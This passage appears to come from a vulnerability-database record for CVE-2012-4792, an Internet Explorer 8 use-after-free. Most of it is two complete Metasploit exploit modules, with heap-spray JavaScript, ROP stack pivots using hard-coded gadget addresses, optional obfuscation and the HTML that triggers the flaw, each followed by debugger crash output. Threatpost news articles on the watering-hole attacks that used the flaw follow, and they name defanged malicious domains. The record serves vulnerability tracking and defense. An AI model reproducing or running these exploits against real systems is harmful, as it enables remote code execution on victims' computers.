'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 \n], \n'Privileged' => false, \n'DisclosureDate' => \"Dec 27 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '5.2' \nos_name = 'Windows Server 2003' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nelse \n# OS not supported \nreturn nil \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? 
and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch)) \n \n# Land the payload at 0x0c0c0b30 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \n| \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n \n# No rop. Just return the payload. \nreturn code if t['Rop'].nil? \n \n=begin \nStack Pivoting to eax: \n0:008> db eax \n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ \n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ 
\n=end \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :msvcrt \nprint_status(\"Using msvcrt ROP\") \nif t.name =~ /Windows XP/ \nstack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret \nstack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) \nelse \nstack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret \nstack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'}) \nend \nelse \nprint_status(\"Using JRE ROP\") \nstack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret \nstack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) \nend \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \n \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \n \nhtml = %Q| \n<!doctype html> \n<html> \n<head> \n<script> \n#{js} \n \nfunction helloWorld() \n{ \nvar e0 = null; \nvar e1 = null; \nvar e2 = null; \n \ntry { \ne0 = document.getElementById(\"a\"); \ne1 = document.getElementById(\"b\"); \ne2 = document.createElement(\"q\"); \ne1.applyElement(e2); \ne1.appendChild(document.createElement('button')); \ne1.applyElement(e0); \ne2.outerText = \"\"; \ne2.appendChild(document.createElement('body')); \n} catch(e) { } \nCollectGarbage(); \nvar eip = window; \nvar data = \"#{Rex::Text.rand_text_alpha(41)}\"; \neip.location = unescape(\"%u0b30%u0c0c\" + data); \n} \n \n</script> \n</head> \n<body onload=\"eval(helloWorld())\"> \n<form id=\"a\"> \n</form> \n<dfn id=\"b\"> \n</dfn> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef on_request_uri(cli, 
request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n \n \n=begin \n(87c.f40): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=???????? 
\n0:008> k \nChildEBP RetAddr \n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504 \n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47 \n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f \n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12 \n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb \n020bfd78 7e418734 mshtml!GlobalWndProc+0x183 \n020bfda4 7e418816 USER32!InternalCallWinProc+0x28 \n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150 \n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306 \n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf \n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 \n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1 \n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab \n020bffec 00000000 kernel32!BaseThreadStart+0x37 \n \n0:008> r \neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=???????? \n \n=end`\n", "sourceHref": "https://packetstormsecurity.com/files/download/119186/ie_cbutton_uaf.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:19:52", "bulletinFamily": "exploit", "description": "", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "id": "PACKETSTORM:119168", "href": "https://packetstormsecurity.com/files/119168/Microsoft-Internet-Explorer-CDwnBindInfo-Object-Use-After-Free.html", "title": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free", "type": "packetstorm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Microsoft Internet Explorer. A \nuse-after-free condition occurs when a CButton object is freed, but a reference \nis kept and used again during a page reload, an invalid memory that's controllable \nis used, and allows arbitrary code execution under the context of the user. \n \nPlease note: This vulnerability has been exploited in the wild targeting \nmainly China/Taiwan/and US-based computers. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'eromang', \n'mahmud ab rahman', \n'juan vazquez', \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2012-4792' ], \n[ 'US-CERT-VU', '154201' ], \n[ 'BID', '57070' ], \n[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], \n[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], \n[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], \n[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ], \n[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ] \n], \n'Payload' => \n{ \n'Space' => 980, \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 
'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 \n], \n'Privileged' => false, \n'DisclosureDate' => \"Dec 27 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '5.2' \nos_name = 'Windows Server 2003' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nelse \n# OS not supported \nreturn nil \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? 
and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch)) \n \n# Land the payload at 0x0c0c0b30 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \n| \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n \n# No rop. Just return the payload. \nreturn code if t['Rop'].nil? \n \n=begin \nStack Pivoting to eax: \n0:008> db eax \n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ \n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ 
\n=end \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :msvcrt \nprint_status(\"Using msvcrt ROP\") \nif t.name =~ /Windows XP/ \nstack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret \nstack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) \nelse \nstack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret \nstack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'}) \nend \nelse \nprint_status(\"Using JRE ROP\") \nstack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret \nstack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) \nend \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \n \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \n \nhtml = %Q| \n<!doctype html> \n<html> \n<head> \n<script> \n#{js} \n \nfunction exploit() \n{ \nvar e0 = null; \nvar e1 = null; \nvar e2 = null; \nvar arrObject = new Array(3000); \nvar elmObject = new Array(500); \nfor (var i = 0; i < arrObject.length; i++) \n{ \narrObject[i] = document.createElement('div'); \narrObject[i].className = unescape(\"ababababababababababababababababababababa\"); \n} \n \nfor (var i = 0; i < arrObject.length; i += 2) \n{ \narrObject[i].className = null; \n} \n \nCollectGarbage(); \n \nfor (var i = 0; i < elmObject.length; i ++) \n{ \nelmObject[i] = document.createElement('button'); \n} \n \nfor (var i = 1; i < arrObject.length; i += 2) \n{ \narrObject[i].className = null; \n} \n \nCollectGarbage(); \n \ntry { \ne0 = document.getElementById(\"a\"); \ne1 = 
document.getElementById(\"b\"); \ne2 = document.createElement(\"q\"); \ne1.applyElement(e2); \ne1.appendChild(document.createElement('button')); \ne1.applyElement(e0); \ne2.outerText = \"\"; \ne2.appendChild(document.createElement('body')); \n} catch(e) { } \nCollectGarbage(); \nfor(var i =0; i < 20; i++) \n{ \narrObject[i].className = unescape(\"ababababababababababababababababababababa\"); \n} \nvar eip = window; \nvar data = \"#{Rex::Text.rand_text_alpha(41)}\"; \neip.location = unescape(\"%u0b30%u0c0c\" + data); \n \n} \n \n</script> \n</head> \n<body onload=\"eval(exploit())\"> \n<form id=\"a\"> \n</form> \n<dfn id=\"b\"> \n</dfn> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n \n \n=begin \n(87c.f40): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=???????? 
\n0:008> k \nChildEBP RetAddr \n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504 \n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47 \n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f \n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12 \n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb \n020bfd78 7e418734 mshtml!GlobalWndProc+0x183 \n020bfda4 7e418816 USER32!InternalCallWinProc+0x28 \n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150 \n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306 \n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf \n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 \n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1 \n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab \n020bffec 00000000 kernel32!BaseThreadStart+0x37 \n \n0:008> r \neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=???????? 
\n \n=end`\n", "sourceHref": "https://packetstormsecurity.com/files/download/119168/ie_cdwnbindinfo_uaf.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:01:36", "bulletinFamily": "info", "description": "Internet Explorer users, exposed to a zero-day vulnerability in the browser and a faulty temporary Fix It from Microsoft, finally got some relief today when the company, as promised, released an out-of-band patch.\n\nMeanwhile, a handful of new telco, manufacturing and human rights sites have been infected and have been serving exploits since the public release of the zero-day, a researcher told Threatpost.\n\nThe [IE security update](<http://technet.microsoft.com/en-us/security/bulletin/ms13-008>) repairs previously unreported flaws in IE 6-8 exploited in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) against government and manufacturing websites worldwide.\n\nExploits were active against IE 8 only, but previous versions also contained the same use-after free vulnerability. Sites visited by high-value targets were compromised and serving exploits via drive-by download attacks. An attacker would then gain the same privileges as a user and be able to execute code remotely on a vulnerable computer.\n\nThe vulnerability was reported shortly after Christmas Day when it was discovered that the Council on Foreign Relations website had been compromised and serving malware for close to a month. 
Soon thereafter, Capstone Turbine Co., a power equipment manufacturer for utilities, was also serving malware as were [political, social and human rights websites in Russia, China and Hong Kong](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>).\n\nResearcher Eric Romang said that since then, he has seen more sites hosting exploits including an Australian telco provider, a US service provider and a US importer of used Japanese auto parts.\n\n\u201cAfter the public release of the zero day, two different variants of the zero day have been found exploited in targeted attacks against human rights activists, a Japanese tourism agency and a Taiwan petrochemical company,\u201d Romang said.\n\n[CVE-2012-4792](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792>) is a memory corruption issue in IE that occurs when the browser accesses an object in memory that has not been initialized or has been deleted; the resulting memory corruption can give the attacker control of the machine.\n\nThe CFR attack cast the first attention on the zero day, which Romang said began as early as Dec. 7. Symantec has linked these attacks to the [Elderwood group](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>), the same group said to be behind the 2009 Aurora attacks on Google. Attackers planted a malicious Adobe Flash file on the CFR site which kicked off a heap spray attack against IE, exploiting the vulnerability. The Javascript would check the Windows language first, and if set to English, Chinese, Japanese, Korean, or Russian, would execute. It also checked cookies in order to deliver the attack only once.\n\nMicrosoft was quick to offer temporary workarounds and mitigations, including a Fix It. The stop-gap was short-lived, however, as security company Exodus Intelligence reported Jan. 4 it had [bypassed the Fix It](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). 
Exodus VP of Intelligence Brandon Edwards told Threatpost the Fix It did cover the paths used by the known exploits, but not all the ways the vulnerability could be reached.\n\nA source said Microsoft was able to take the details provided by Exodus and confirm the Fix It could be bypassed; Exodus did not provide full source code for its proof of concept to Microsoft, as it only does so for its customers.\n\nPast watering hole attacks have been linked to nation states, including China. They are intelligence-driven and target sites frequented by influential people\u2014the real targets of the attacks. Attackers inject malicious files onto websites hoping to snare people with an interest in the site\u2019s focus. These types of attacks are not only effective, but are more economical than targeted attacks that start with a phishing email.\n\nMicrosoft continues to call the impact of the attacks limited. IE 8 installations, meanwhile, account for the majority of enterprise market share, followed by IE 7 and 6. IE 9 and 10 are not vulnerable, Microsoft said.\n\nIn the meantime, users are urged to apply the IE patch immediately.\n\n\u201cPlease note that this update is a real patch and not a cumulative update as we are used to for typical Internet Explorer updates,\u201d said Wolfgang Kandek, CTO at Qualys. 
\u201cIt is highly recommended to have [MS12-077, the last cumulative Internet Explorer update](<http://technet.microsoft.com/en-us/security/bulletin/ms12-077>), installed before applying MS13-008.\u201d\n", "modified": "2013-05-10T14:29:20", "published": "2013-01-14T20:29:58", "id": "THREATPOST:39F4459D592F1F044F7A11772E4B8ACE", "href": "https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403/", "type": "threatpost", "title": "Out-of-Band IE Patch Released as More Sites Attacked", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:51", "bulletinFamily": "info", "description": "The United States Department of Labor website is the latest high-profile government site to fall victim to a watering hole attack. Researchers at a number of security companies reported today that the site was hosting malware and redirecting visitors to a site hosting the Poison Ivy remote access Trojan.\n\nThe malware has since been removed and law enforcement is investigating.\n\nThe attackers inserted javascript onto the DoL\u2019s Site Exposure Matrices (SEM) website that sent visitors to another site hosting an exploit for [CVE-2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) targeting Windows XP users running Internet Explorer versions 6-8. The vulnerability, a use-after-free memory vulnerability in the browser, enables attackers to remotely run code on a compromised machine. 
This has been exploited in the wild since December and was [patched earlier this year by Microsoft](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>).\n\n\u201cThis profile fits the enterprise user machine profile typical of large enterprise and government agencies,\u201d said Invincea founder and CEO Anup Ghosh.\n\nThe DoL\u2019s SEM site is a repository of data on toxic substances present at facilities run by the Department of Energy.\n\nThe malware drops an executable called conime[.]exe onto the infected computer and opens remote connections on ports 443 and 53, Invincea said, adding there were two redirects present on the DoL page sending visitors to dol[.]ns01[.]us. Once the user is redirected, a file is executed, ports are opened and registry changes are made to maintain persistence on the machine. Ghosh said that one of the command and control servers had already been blacklisted by Google.\n\nAlien Vault Lab manager Jaime Blasco said the attacker also collects a bit of system information including whether a number of antivirus programs, Flash, Java, and Microsoft Office are running, and sends that data to the remote server. Blasco added that the command and control protocol used in the attack matches that of a Chinese espionage gang known as DeepPanda; other characteristics of this attack match those used against a Thai human rights nongovernment organization website.\n\n[Watering hole attacks](<http://threatpost.com/why-watering-hole-attacks-work-032013/>) have been used primarily by state-sponsored attackers to spy on rival governments, dissident citizen groups and manufacturing organizations. Rather than rely on spear phishing, attackers infect websites of common interest to their targets, generally with javascript via an iframe that redirects the victim to a site hosting espionage malware. 
Some high-profile watering hole attacks have been carried out this year against the [Council on Foreign Relations website](<http://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) and a [popular iOS mobile developer forum](<http://threatpost.com/ios-developer-site-core-facebook-apple-watering-hole-attack-022013/>) that snared a number of victims at Facebook, Apple and Twitter.\n\nIn this case, it\u2019s likely the targets were Department of Labor employees and other federal employees tied to the DoL and Department of Energy.\n\n\u201cIt is important to note that most websites are vulnerable to exploit. As a result, exploiting legitimate websites have become a common vector for penetrating enterprise networks and individual machines,\u201d Ghosh said. \u201cThe Department of Labor is no exception.\u201d\n", "modified": "2013-07-02T18:18:20", "published": "2013-05-01T16:30:58", "id": "THREATPOST:37FD3A8A338F59D00D9F7966AFF5067F", "href": "https://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/100081/", "type": "threatpost", "title": "Watering Hole Attack Hits US Department of Labor Website", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:51", "bulletinFamily": "info", "description": "The scope of a [watering hole attack targeting the U.S. Department of Labor website](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/>) widened significantly over the weekend. 
Researchers are reporting that as many as nine websites, including a European aerospace, defense and security manufacturer as well as a number of non-profit organizations have also been compromised and are redirecting visitors to a website hosting malware.\n\nMicrosoft, meanwhile, released an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2847140>) warning Internet Explorer 8 users that the attackers are exploiting a zero-day vulnerability in Internet Explorer 8, and [not CVE-2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) as originally was reported. Yesterday morning, a [Metasploit module](<https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit>) was released for this vulnerability, heightening the likelihood of additional attacks or inclusion into a commercial or private exploit kit.\n\nMicrosoft urges IE 8 users to upgrade to a newer version of the browser\u2014IE 6, 7, 9 and 10 are not vulnerable\u2014and that it will either release an out-of-band patch or address the flaw in an upcoming Patch Tuesday release. The next scheduled Microsoft security updates are next week.\n\nThe original outbreak was made public May 1 when it was reported that the DoL\u2019s Site Exposure Matrices website was infected and attackers had injected javascript via an iFrame that redirected site visitors to a site hosting the Poison Ivy remote access Trojan.\n\nThe espionage malware was originally thought to be exploiting a use-after free memory corruption vulnerability that Microsoft had patched earlier this year. 
The DoL\u2019s SEM site is a repository of data on toxic substances present at facilities run by the Department of Energy, and researchers at Invincea speculated that the attackers\u2019 targets were downstream employees of the Department of Energy who work on nuclear weapons programs.\n\nInvincea CTO and founder Anup Ghosh confirmed that a [previously unreported use-after free vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347>) was being exploited in this attack and that only IE 8 was affected. Ghosh said his researchers were still able to [reproduce an infection](<http://www.invincea.com/2013/05/part-2-us-dept-labor-watering-hole-pushing-poison-ivy-via-ie8-zero-day/>) on a Windows XP machine running Windows 8 that was patched with MS13-008 that addressed CVE-2012-4792.\n\nMicrosoft confirmed in its advisory that this is a remote code execution vulnerability, and that IE does not properly handle objects in memory that have been deleted or not properly allocated. Microsoft suggests that users take caution when sent links via email or IM messages. In the meantime, Microsoft suggests setting Internet and local intranet security zones to \u201chigh\u201d to block ActiveX Controls and Scripting, as well as to configure IE to prompt before running Active Scripting.\n\nThe malware drops an executable called conime[.]exe onto the infected computer and opens remote connections on ports 443 and 53, Invincea said, adding there were two redirects present on the DoL page sending visitors to dol[.]ns01[.]us. Once the user is redirected, a file is executed, ports are opened and registry changes are made to maintain persistence on the machine. 
Ghosh said that one of the command and control servers had already been blacklisted by Google.\n\nAlien Vault Lab manager Jaime Blasco said that researchers had detected [redirects to another server](<http://labs.alienvault.com/labs/index.php/2013/new-internet-explorer-zeroday-was-used-in-the-dol-watering-hole-campaign/>) at sellagreement[.]com. That domain was also serving some of the malicious payloads found on dol[.]ns01[.]us. Blasco recommends checking logs for connections to either of those domains.\n\nFrom the initial analysis of the javascript on the DoL site, it collects system information checking for a number of antimalware programs, as well as third-party software such as Flash and Java, likely in order to launch further exploits. Blasco added that the command and control protocol used in the attack matches that of a Chinese espionage gang known as DeepPanda; other characteristics of this attack match those used against a Thai human rights nongovernment organization website.\n\nThe Poison Ivy RAT, meanwhile, is a backdoor that an attacker can use to remotely access compromised machines and add or delete files, edit Registry files, view or kill running processes, network connections and services, and add or delete applications. 
